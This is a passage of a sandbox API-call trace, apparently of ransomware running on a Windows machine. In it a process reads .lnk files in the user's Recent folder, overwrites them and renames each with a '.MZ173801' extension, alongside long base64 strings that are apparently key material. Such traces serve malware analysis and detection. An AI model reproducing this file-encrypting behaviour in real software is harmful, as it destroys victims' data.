lpOverlapped=0x0) returned 1 [0109.494] CloseHandle (hObject=0x3f4) returned 1 [0109.495] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JA9a6Ju2ZS4.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ja9a6ju2zs4.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JA9a6Ju2ZS4.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\ja9a6ju2zs4.lnk.mz173801")) returned 1 [0109.495] GetCurrentThreadId () returned 0x1358 [0109.495] GetCurrentThreadId () returned 0x1358 [0109.495] GetCurrentThreadId () returned 0x1358 [0109.495] GetCurrentThreadId () returned 0x1358 [0109.496] GetCurrentThreadId () returned 0x1358 [0109.496] GetCurrentThreadId () returned 0x1358 [0109.496] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9718987e, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9718987e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9718bf88, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JHYEYVRjOm0-o3XP-xL.lnk", cAlternateFileName="JHYEYV~1.LNK")) returned 1 [0109.496] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.496] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.496] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JHYEYVRjOm0-o3XP-xL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jhyeyvrjom0-o3xp-xl.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9718987e, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9718987e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x9718bf88, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x408)) returned 1 [0109.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.496] GetCurrentThreadId () returned 0x1358 [0109.496] GetCurrentThreadId () returned 0x1358 [0109.496] GetCurrentThreadId () returned 0x1358 [0109.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.497] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0109.497] GetCurrentThreadId () returned 0x1358 [0109.497] GetCurrentThreadId () returned 0x1358 [0109.497] GetCurrentThreadId () returned 0x1358 [0109.497] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JHYEYVRjOm0-o3XP-xL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jhyeyvrjom0-o3xp-xl.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.497] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0109.497] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.497] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x408 [0109.498] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0109.498] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x408, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x408, lpOverlapped=0x0) returned 1 [0109.498] CloseHandle (hObject=0x3f4) returned 1 [0109.498] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JHYEYVRjOm0-o3XP-xL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jhyeyvrjom0-o3xp-xl.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0109.499] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x408, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x408, lpOverlapped=0x0) returned 1 [0109.500] CloseHandle (hObject=0x3f4) returned 1 [0109.501] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JHYEYVRjOm0-o3XP-xL.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jhyeyvrjom0-o3xp-xl.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JHYEYVRjOm0-o3XP-xL.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jhyeyvrjom0-o3xp-xl.lnk.mz173801")) returned 1 [0109.502] GetCurrentThreadId () returned 0x1358 [0109.502] GetCurrentThreadId () returned 0x1358 [0109.502] GetCurrentThreadId () returned 0x1358 [0109.502] GetCurrentThreadId () returned 0x1358 [0109.502] GetCurrentThreadId () returned 0x1358 [0109.502] GetCurrentThreadId () returned 0x1358 [0109.502] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e48b6a5, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7e48b6a5, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7e48b6a5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="JRD90ylj1Dg_Ngx4FKM.flv.lnk", cAlternateFileName="JRD90Y~1.LNK")) returned 1 [0109.502] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0109.502] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0109.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\JRD90ylj1Dg_Ngx4FKM.flv.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\jrd90ylj1dg_ngx4fkm.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e48b6a5, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7e48b6a5, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x7e48b6a5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0109.502] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.502] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0109.503] GetCurrentThreadId () returned 0x1358 [0109.503] GetCurrentThreadId () returned 0x1358 [0109.503] GetCurrentThreadId () returned 0x1358 [0109.503] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0109.503] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 